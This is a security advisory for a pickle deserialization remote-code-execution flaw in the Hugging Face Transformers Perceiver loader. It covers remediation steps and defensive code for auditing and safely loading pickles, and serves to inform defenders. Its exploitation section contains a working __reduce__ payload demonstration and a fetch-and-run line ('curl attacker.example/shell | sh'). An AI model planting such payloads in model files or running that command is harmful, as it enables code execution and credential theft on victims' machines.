CVE-2025-14920

UNKNOWN
Published December 23, 2025
CISO Take

CVE-2025-14920 is a deserialization RCE in Hugging Face Transformers' Perceiver model loader — an attacker can achieve full code execution on any system that loads a malicious model file. Organizations pulling models from HuggingFace Hub, shared drives, or external sources are directly exposed. Immediate action: audit where Transformers is deployed, restrict model loading to verified/signed sources, and patch or pin to a fixed version once available.

Affected Systems

Package: transformers
Ecosystem: pip
Vulnerable Range: (not provided)
Patched: No patch

Do you use transformers? You're affected.
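One quick way to answer that per environment is to query installed distribution metadata. A minimal sketch using only the standard library; `transformers` is the PyPI distribution name, and the helper name is illustrative:

```python
import importlib.metadata

def installed_version(dist_name: str):
    """Return the installed version of a distribution, or None if absent."""
    try:
        return importlib.metadata.version(dist_name)
    except importlib.metadata.PackageNotFoundError:
        return None

ver = installed_version("transformers")
if ver is None:
    print("transformers not installed in this environment")
else:
    print(f"transformers {ver} installed -- check against the advisory")
```

Run this in each Python environment (virtualenvs, containers, CI images), since a single host commonly carries several independent installs.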

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Moderate

Recommended Action

  1. PATCH: Monitor Hugging Face Transformers releases for a fix targeting the Perceiver model file parser; pin to the patched version as soon as it is available.
  2. INVENTORY: Identify all environments with `transformers` installed that load Perceiver models (`grep -r 'Perceiver' --include='*.py'`).
  3. RESTRICT MODEL SOURCES: Enforce allowlisting: only load models from internal artifact registries with SHA-256 hash verification. Reject models from arbitrary URLs or unverified Hub accounts.
  4. SANDBOX: Run model loading in isolated environments (separate containers/VMs with no network egress) and inspect model files with tools like `fickling` before loading in production.
  5. DETECT: Alert on unexpected network connections or child-process spawns from Python ML processes.
  6. WORKAROUND: If Perceiver models are not in use, block their loading at the framework level or remove the model class from the import path.
  7. REVIEW: Audit recent downloads of Perceiver model files from public registries for signs of tampering.
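The pre-load inspection in step 4 can be approximated with the standard library alone. This sketch illustrates the idea behind tools like `fickling` (which do this far more thoroughly and should be preferred in production): walk a pickle's opcode stream and flag opcodes that can resolve globals or invoke callables, without ever executing the file:

```python
import pickle
import pickletools

# Opcodes that can import names or call code during unpickling.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX"}

def audit_pickle(data: bytes):
    """Return suspicious opcode names found in a pickle blob,
    without executing any of it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS]

# Plain tensor-like data produces no suspicious opcodes:
print(audit_pickle(pickle.dumps({"weights": [0.1, 0.2]})))  # -> []
```

Any hit from a scan like this on a downloaded model file is grounds to quarantine it; a clean scan is necessary but not sufficient, which is why it belongs alongside sandboxing, not instead of it.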

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 17 - Quality management system
Article 9 - Risk management system
ISO 42001
A.10.1 - AI system supply chain security
A.6.1.3 - AI supply chain security
A.8.4 - AI system technical security
NIST AI RMF
GOVERN-6.1 - AI supply chain risk management
GV-1.6 - Organizational risk tolerance
MANAGE-2.2 - Mechanisms to respond to AI risks
MS-2.5 - Practices and personnel for AI risk management
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities
LLM05 (2023) - Supply Chain Vulnerabilities

Technical Details

NVD Description

Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423.
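The "lack of proper validation" above maps directly onto Python's pickle behavior: a stock `pickle.load` will resolve and invoke arbitrary globals named in the stream. As a hedged illustration of the defensive counterpart (the class and policy here are illustrative, not part of Transformers), the standard library's `pickle.Unpickler.find_class` hook can refuse every global, so pure data still loads while code-bearing payloads fail:

```python
import io
import pickle

class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global, so a
    __reduce__-style payload cannot reach os/subprocess/eval."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"blocked global {module}.{name} during deserialization")

def safe_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()

# Pure data round-trips; anything that needs an import is rejected.
print(safe_loads(pickle.dumps({"ok": [1, 2]})))  # -> {'ok': [1, 2]}
```

Real model checkpoints usually do need some globals (tensor classes, for instance), so production loaders typically allowlist a small set of known-safe names rather than blocking everything; the all-or-nothing version above just makes the mechanism visible.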

Exploitation Scenario

An adversary crafts a malicious Perceiver model file containing a serialized Python object that executes arbitrary commands upon deserialization (classic pickle exploit pattern: `__reduce__` returning `os.system` or `subprocess`). The attacker uploads this model to HuggingFace Hub under a plausible name (e.g., 'perceiver-base-finetuned-images-v2'). A data scientist or automated pipeline calls `PerceiverModel.from_pretrained('attacker/perceiver-base-finetuned-images-v2')`, the Transformers library deserializes the model file without validation, and the payload executes — establishing a reverse shell, exfiltrating API keys from environment variables, or pivoting to internal infrastructure. In CI/CD contexts where models are pulled during training jobs, this achieves server-side RCE with no further attacker interaction.
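The `__reduce__` pattern named above can be shown with a benign stand-in. In this sketch, `eval("2 + 2")` takes the place of the `os.system` or `subprocess` call an attacker would use; the mechanism is otherwise exactly as described:

```python
import pickle

class Payload:
    # pickle calls the returned callable with the given arguments
    # at load time; its return value becomes the deserialized object.
    def __reduce__(self):
        return (eval, ("2 + 2",))

blob = pickle.dumps(Payload())  # what would ship inside a model file
result = pickle.loads(blob)     # code executes during deserialization
print(result)  # -> 4, proving the callable ran
```

Swap the harmless `eval` for `os.system("curl attacker.example/shell | sh")` and the same `loads` call becomes the RCE in the scenario above, which is why hash allowlisting and sandboxed loading matter even for files that "are just weights".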

Weaknesses (CWE)

CWE-502 - Deserialization of Untrusted Data

Timeline

Published
December 23, 2025
Last Modified
January 21, 2026
First Seen
December 23, 2025